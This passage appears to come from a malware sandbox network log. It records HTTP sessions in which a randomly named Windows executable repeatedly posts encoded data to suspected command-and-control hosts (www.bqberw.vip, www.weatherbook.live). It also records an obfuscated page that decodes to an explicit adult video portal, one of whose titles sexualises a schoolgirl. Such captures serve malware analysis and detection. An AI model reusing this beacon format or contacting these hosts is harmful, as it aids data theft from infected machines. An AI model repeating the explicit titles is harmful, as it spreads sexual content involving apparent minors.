                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:44:31.185806990 CEST1236INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:44:31 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 18836
                                                                                          Last-Modified: Mon, 30 Sep 2024 16:20:03 GMT
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: "66facfb3-4994"
                                                                                          Accept-Ranges: bytes
                                                                                          Data Raw: 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 75 66 65 66 66 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 7a 68 2d 43 4e 25 32 32 25 33 45 25 33 43 68 65 61 64 25 33 45 25 33 43 74 69 74 6c 65 25 33 45 25 75 35 39 32 37 25 75 38 63 36 31 25 75 38 39 63 36 25 75 39 38 39 31 5f 64 78 32 32 2e 78 79 7a 25 75 35 36 64 65 25 75 35 62 62 36 25 75 35 62 66 63 25 75 38 32 32 61 25 33 43 2f 74 69 74 6c 65 25 33 45 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 6b 65 79 77 6f 72 64 73 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 25 75 37 37 65 64 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 36 34 31 65 25 75 37 62 31 31 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 38 39 63 36 25 75 39 38 39 31 25 75 35 32 30 36 25 75 34 65 61 62 25 32 43 25 75 35 31 34 64 25 75 38 64 33 39 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 [TRUNCATED]
                                                                                          Data Ascii: <script>...document.write(unescape("%ufeff%3C%21DOCTYPE%20html%3E%3Chtml%20lang%3D%22zh-CN%22%3E%3Chead%3E%3Ctitle%3E%u5927%u8c61%u89c6%u9891_dx22.xyz%u56de%u5bb6%u5bfc%u822a%3C/title%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22%u77ed%u89c6%u9891%2C%u641e%u7b11%u89c6%u9891%2C%u89c6%u9891%u5206%u4eab%2C%u514d%u8d39%u89c6%u9891%2C%u5728%u7ebf%u89c6%u9891%2C%u9884%u544a%u7247%22%3E%3Cmeta%20name%3D%22description%22%20content%3D%22%u63d0%u4f9b%u6700%u65b0%u6700%u5feb%u7684%u89c6%u9891%u5206%u4eab%u6570%u636e%22%3E%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%20/%3E%3Cmeta%20name%3D%22renderer%22%20content%3D%22webkit%7Cie-comp%7Cie-stand%22%20/%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%20/%3E%3Cmeta%20name%3D%22format-detection%22%20content%3D%22telephone%3Dno%22%20/%3E%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3D480%2C%20user-scalable%3Dno%2C%20viewport-fit%3Dcover%22%20/%3E%3Cm
                                                                                          Sep 30, 2024 18:44:31.185832024 CEST1236INData Raw: 65 74 61 25 32 30 68 74 74 70 2d 65 71 75 69 76 25 33 44 25 32 32 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 6e 6f 2d 63 61 63 68 65 25 32 43 25 32 30 6e 6f 2d 73 74 6f 72 65 25 32 43 25 32 30
                                                                                          Data Ascii: eta%20http-equiv%3D%22Cache-Control%22%20content%3D%22no-cache%2C%20no-store%2C%20must-revalidate%22%20/%3E%3Cscript%20src%3D%22/Tpl/cl/facai/js/cnzz.js%22%20type%3D%22text/javascript%22%3E%3C/script%3E%3Clink%20href%3D%22/Tpl/cl/facai/css/glo
                                                                                          Sep 30, 2024 18:44:31.185849905 CEST348INData Raw: 6e 61 76 25 32 32 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 74 79 70 65 25 33 44 25 32 32 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 25 32 32 25 33 45 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 25 32 38 77 69 6e 64 6f 77 2e 64 68 63 64
                                                                                          Data Ascii: nav%22%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhcd%29%3B%3C/script%3E%3C/div%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22head_h%22%3E%3C/div%3E%3Cscript%20type%3D%22text/ja
                                                                                          Sep 30, 2024 18:44:31.185867071 CEST1236INData Raw: 71 25 32 30 74 6f 70 74 79 70 65 25 32 32 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 74 79 70 65 25 33 44 25 32 32 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 25 32 32 25 33 45 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 25 32 38 77 69 6e
                                                                                          Data Ascii: q%20toptype%22%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhcd%29%3B%3C/script%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhxwz%29%3B%3C/script%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E
                                                                                          Sep 30, 2024 18:44:31.185879946 CEST224INData Raw: 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 75 38 62 61 39 25 75 35 39 64 30 25 75 35 39 64 30 25 75 38 64 65 61 25 75 34 65 30 62 25 75 36 37 36 35 25 75 35 65 32 65 25 75 36 32 31 31 25 75 35 34 30 33 25 75 39 65 32 31 25 75 35 64 66
                                                                                          Data Ascii: 3D%22_blank%22%3E%u8ba9%u59d0%u59d0%u8dea%u4e0b%u6765%u5e2e%u6211%u5403%u9e21%u5df4~%u6deb%u8361%u5145%u65a5%u5c0f%u5634~%u706b%u529b%u8f93%u51fa%u6e7f%u6dcb%u5c0f%u7a74%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span
                                                                                          Sep 30, 2024 18:44:31.185894012 CEST1236INData Raw: 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6c 65 61 72 25 32 32 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32
                                                                                          Data Ascii: %3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%22n_r%22%3E%3Cdiv%20class%3D%22t_p%22%3E%3Ca%20href%3D%22https%3A//xjwj60erdhd1j944a2d6f829h.92
                                                                                          Sep 30, 2024 18:44:31.185909033 CEST124INData Raw: 32 30 63 6c 61 73 73 25 33 44 25 32 32 6c 61 7a 79 25 32 32 25 32 30 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 6b 6b 66 37 6c 6d 61 71 2f 69 6e 64 65 78 2e 6a 70 67
                                                                                          Data Ascii: 20class%3D%22lazy%22%20data-original%3D%22https%3A//md145v1.com/kkf7lmaq/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/
                                                                                          Sep 30, 2024 18:44:31.186395884 CEST1236INData Raw: 25 33 45 25 33 43 2f 61 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 77 5f 7a 25 32 32 25 33 45 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34
                                                                                          Data Ascii: %3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34480.html%22%20target%3D%22_blank%22%3E%u5973%u5b66%u751f%u5728%u88ab%u5360%u7528%u7684%u5395%u6240%u524d%u5c3f%u5c3f~%281%29%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%2
                                                                                          Sep 30, 2024 18:44:31.186439037 CEST1236INData Raw: 6f 72 69 67 69 6e 61 6c 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 33 79 79 38 38 64 61 64 2f 69 6e 64 65 78 2e 6a 70 67 2e 6a 73 25 32 32 25 32 30 73 72 63 25 33 44 25 32 32 2f 69 6d 61 67 65 73 2f 62 6c
                                                                                          Data Ascii: original%3D%22https%3A//md145v1.com/3yy88dad/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34478.html%22%20target%3D%22_blank%22%3Emumuq_%u8fa6%u516c%u5ba4%u5
                                                                                          Sep 30, 2024 18:44:31.186454058 CEST348INData Raw: 73 25 33 44 25 32 32 74 5f 70 25 32 32 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34 34 35 36 2e 68 74 6d 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 33 43 69
                                                                                          Data Ascii: s%3D%22t_p%22%3E%3Ca%20href%3D%22/p/1/34456.html%22%20target%3D%22_blank%22%3E%3Cimg%20class%3D%22lazy%22%20data-original%3D%22https%3A//md145v1.com/ygokcnfz/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20clas
                                                                                          Sep 30, 2024 18:44:31.190866947 CEST1236INData Raw: 35 34 65 35 25 75 35 34 65 35 25 75 36 36 32 66 25 75 37 33 61 39 25 75 36 65 33 38 25 75 36 32 30 66 25 75 38 66 64 38 25 75 36 36 32 66 25 75 37 33 61 39 25 75 34 65 62 61 25 75 35 62 62 36 25 75 37 36 38 34 25 75 35 63 30 66 25 75 37 61 37 34
                                                                                          Data Ascii: 54e5%u54e5%u662f%u73a9%u6e38%u620f%u8fd8%u662f%u73a9%u4eba%u5bb6%u7684%u5c0f%u7a74-%u5343%u591c%u55b5%u55b5%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.5497133.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:46.365623951 CEST797OUTPOST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 77 62 33 49 77 72 55 7a 46 56 73 61 5a 55 37 37 57 6f 53 62 41 49 54 6c 45 57 61 41 65 38 31 79 65 79 67 66 6b 4f 35 32 75 30 7a 6c 75 61 64 33 5a 77 36 30 6e 57 31 44 43 59 73 67 62 51 6f 76 79 76 4c 61 72 72 70 52 56 30 53 47 62 71 48 33 44 56 6b 39 4e 64 61 59 2f 6c 47 32 78 56 73 77 53 4b 45 63 42 75 48 65 34 53 48 51 46 30 66 50 32 75 59 78 6f 31 46 63 35 6c 32 45 69 72 64 56 4e 55 64 46 4d 55 42 56 6d 65 33 55 69 44 47 46 64 30 77 30 36 77 63 2b 61 54 55 33 44 37 71 2f 62 4b 48 41 46 38 61 6d 77 6d 61 43 77 47 6d 4a 43 2f 6b 54 37 2f 50 66 4e 78 73 3d
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFwb3IwrUzFVsaZU77WoSbAITlEWaAe81yeygfkO52u0zluad3Zw60nW1DCYsgbQovyvLarrpRV0SGbqH3DVk9NdaY/lG2xVswSKEcBuHe4SHQF0fP2uYxo1Fc5l2EirdVNUdFMUBVme3UiDGFd0w06wc+aTU3D7q/bKHAF8amwmaCwGmJC/kT7/PfNxs=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.5497143.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:48.912132978 CEST817OUTPOST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 78 36 48 49 79 49 73 7a 4e 56 73 5a 63 55 37 37 59 49 53 6c 41 49 66 6c 45 55 33 64 65 50 52 79 51 79 77 66 6c 4b 56 32 6e 6b 7a 6c 67 36 64 32 48 41 36 2f 6e 57 35 68 43 63 73 67 62 55 34 76 79 76 37 61 6f 61 70 53 61 45 53 41 55 4b 48 31 4d 31 6b 39 4e 64 61 59 2f 6c 54 64 78 52 41 77 4f 71 55 63 41 4d 2f 66 6b 43 48 54 45 30 66 50 39 4f 59 31 6f 31 45 37 35 6e 44 70 69 6f 31 56 4e 55 4e 46 50 46 42 57 73 65 32 2b 2f 7a 48 6b 4e 46 74 4f 69 77 4d 46 61 44 4a 67 61 59 69 47 61 38 71 71 66 65 53 4f 6a 47 32 36 67 56 75 2b 54 50 46 36 68 63 66 76 54 6d 36 5a 39 76 42 65 4f 7a 2f 47 6f 48 65 64 34 72 39 47 51 34 54 4e
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFx6HIyIszNVsZcU77YISlAIflEU3dePRyQywflKV2nkzlg6d2HA6/nW5hCcsgbU4vyv7aoapSaESAUKH1M1k9NdaY/lTdxRAwOqUcAM/fkCHTE0fP9OY1o1E75nDpio1VNUNFPFBWse2+/zHkNFtOiwMFaDJgaYiGa8qqfeSOjG26gVu+TPF6hcfvTm6Z9vBeOz/GoHed4r9GQ4TN


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.5497153.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:51.458947897 CEST1834OUTPOST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 78 36 48 49 79 49 73 7a 4e 56 73 5a 63 55 37 37 59 49 53 6c 41 49 66 6c 45 55 33 64 65 50 5a 79 51 45 38 66 6b 72 56 32 39 6b 7a 6c 2f 4b 64 7a 48 41 36 75 6e 57 52 6c 43 63 70 58 62 53 6b 76 7a 4d 7a 61 74 6f 42 53 42 30 53 41 4d 36 48 30 44 56 6b 6f 4e 65 69 63 2f 6c 44 64 78 52 41 77 4f 76 59 63 51 75 48 66 6d 43 48 51 46 30 66 44 32 75 59 64 6f 31 63 42 35 6e 47 55 69 59 56 56 4e 31 39 46 4b 33 70 57 67 65 33 59 38 7a 48 47 4e 46 68 72 69 77 51 34 61 41 56 47 61 59 61 47 57 39 72 64 49 39 43 79 34 45 6d 38 6d 33 69 53 52 49 46 67 69 2f 6a 30 66 55 43 50 2f 66 64 39 48 48 44 62 71 54 50 4a 69 64 68 4d 64 50 4f 48 37 68 66 7a 6e 73 2b 53 44 31 63 75 33 47 30 4d 75 48 62 53 7a 30 38 6e 4c 53 4d 71 46 2f 52 56 48 37 59 6d 55 49 2f 62 62 78 4b 44 74 6c 76 39 49 36 76 58 61 48 5a 49 77 6e 50 41 41 74 59 67 4d 7a 59 30 58 64 7a 59 75 4e 45 2b 77 76 6a 6a 32 62 6b 46 72 55 57 49 2f 55 69 75 4a 4f 38 45 30 56 31 72 4e 66 51 79 76 61 75 4d 6c 73 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFx6HIyIszNVsZcU77YISlAIflEU3dePZyQE8fkrV29kzl/KdzHA6unWRlCcpXbSkvzMzatoBSB0SAM6H0DVkoNeic/lDdxRAwOvYcQuHfmCHQF0fD2uYdo1cB5nGUiYVVN19FK3pWge3Y8zHGNFhriwQ4aAVGaYaGW9rdI9Cy4Em8m3iSRIFgi/j0fUCP/fd9HHDbqTPJidhMdPOH7hfzns+SD1cu3G0MuHbSz08nLSMqF/RVH7YmUI/bbxKDtlv9I6vXaHZIwnPAAtYgMzY0XdzYuNE+wvjj2bkFrUWI/UiuJO8E0V1rNfQyvauMlsNE0WZyykjx+Hy75ukIwsOvc5G2eV29r7ps314XEqAZDilZPmdA8bsXvYZHxHqggrT2aiHt9VxUEgyhxLf3yzYXVXaqk5Q/DC1/qRUERZsqqtPYwTYQ1joXPJyTkPvzOJ1YNUWCBgCgXEmIN3s4NTGLkbxO8Q/o6TxEHJzDPvenOj+0Us2mDVvbNTqEivZGg7H3vwlrnJ1XEqKg09rvy6udSTK4cJhpjqWLzZWSQvzwmF6G+NrS+k8ze/nkrnbO9dsBjgoKxcj6zu2cPiBtxuZlGNXuNpqfsIxLzCu2l0Gf3QTdvnzbdO4YEt5emKzOOHBpx93+Es63Cw+SPxNTAapb+82nbxvjMFyRKPjTAyaX6yvsjfDwFIirbPa7lpLzvNr62KlZGVjYn89n3DQ4mGMZ7QpWrTtclsOp2oSJIZCrAxSbt/IeAkWNWCE6aCl4/YB2RtZSfcHSI0Ry7/e9yCt4zebnFXt9LJ2OgngDKxPc0yKckMwIcJwIPuRLCEnPCtGD+m68b3vyZxvBnTEhWp5SFfzDR9p3wZBRnIKF9NIMgoo9cFX/j0My7zeM+zAGklDKX9SFyz37YrCy/UuuFr/tDTeIbHtIgRnA5VtBITw3tlW5CIr6TpeG0VyAL2qeb1JzGTN2wUvqk/ld9sElIOsgxG8M50forkV3 [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.5497163.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:54.016280890 CEST541OUTGET /ezjb/?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.bqberw.vip
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:44:54.473778963 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:44:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 6c 33 53 70 38 36 4c 64 48 51 4b 35 31 4a 79 45 31 62 59 53 4c 52 77 72 5a 7a 37 39 65 4c 6a 32 4f 50 61 39 53 32 65 61 63 76 68 4f 56 67 45 31 6d 70 6c 4f 6f 6a 58 79 6d 4f 5a 39 59 44 47 66 67 67 77 41 43 62 6b 39 57 6a 59 72 7a 75 48 6d 76 6f 5a 49 58 79 47 77 56 4c 6e 4e 48 33 45 6d 50 74 69 37 30 30 53 66 33 6d 42 6b 56 71 4e 6e 4a 4a 75 4f 37 54 53 71 49 53 76 59 7a 50 74 6c 7a 51 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.5497173.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:44:59.522563934 CEST815OUTPOST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 61 4d 45 49 6d 4c 64 52 6a 5a 35 44 56 37 42 77 57 69 49 76 30 54 7a 4a 31 57 42 74 79 76 46 33 7a 45 41 45 73 32 63 6b 43 46 58 4f 33 74 78 2b 57 6e 32 47 4a 2f 51 37 38 4c 50 45 6b 46 4f 57 56 2b 30 61 79 4a 54 41 73 33 68 6c 52 44 36 65 4e 63 4e 63 45 71 6f 62 2f 56 6d 68 2f 4c 2f 53 37 49 49 73 51 31 30 76 58 76 6d 64 70 6d 71 35 69 66 6d 34 4a 37 37 70 39 4e 5a 74 6e 54 42 73 53 5a 64 6f 2b 63 78 55 30 6a 37 4e 51 73 74 66 73 68 50 37 4e 4e 6d 7a 32 2f 71 6e 78 69 50 58 6e 48 7a 65 4e 6b 4b 65 50 66 4f 48 65 41 6c 57 53 42 75 77 68 46 6a 33 6f 67 3d
                                                                                          Data Ascii: gHCXmDU=1AbqsGSWvjVHPaMEImLdRjZ5DV7BwWiIv0TzJ1WBtyvF3zEAEs2ckCFXO3tx+Wn2GJ/Q78LPEkFOWV+0ayJTAs3hlRD6eNcNcEqob/Vmh/L/S7IIsQ10vXvmdpmq5ifm4J77p9NZtnTBsSZdo+cxU0j7NQstfshP7NNmz2/qnxiPXnHzeNkKePfOHeAlWSBuwhFj3og=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.5497183.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:02.067527056 CEST835OUTPOST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 4c 46 33 57 6f 41 48 74 32 63 70 69 46 58 61 6e 74 77 6a 6d 6e 39 47 4a 44 32 37 2b 66 50 45 67 56 4f 57 51 43 30 61 42 52 55 42 38 33 6a 70 78 44 38 44 39 63 4e 63 45 71 6f 62 2f 51 4e 68 38 37 2f 53 49 67 49 74 31 4a 33 78 48 76 35 4c 35 6d 71 39 69 66 36 34 4a 36 65 70 38 52 7a 74 68 58 42 73 54 70 64 6f 71 49 32 4e 45 6a 68 44 77 74 68 58 35 38 6b 6c 63 4e 4e 2b 48 32 35 32 41 53 77 66 78 71 5a 45 76 73 69 4e 76 7a 32 58 4e 49 53 48 69 67 48 71 43 56 54 70 2f 33 32 68 7a 6b 50 35 41 52 6e 57 58 75 78 33 43 66 61 6c 38 71 57
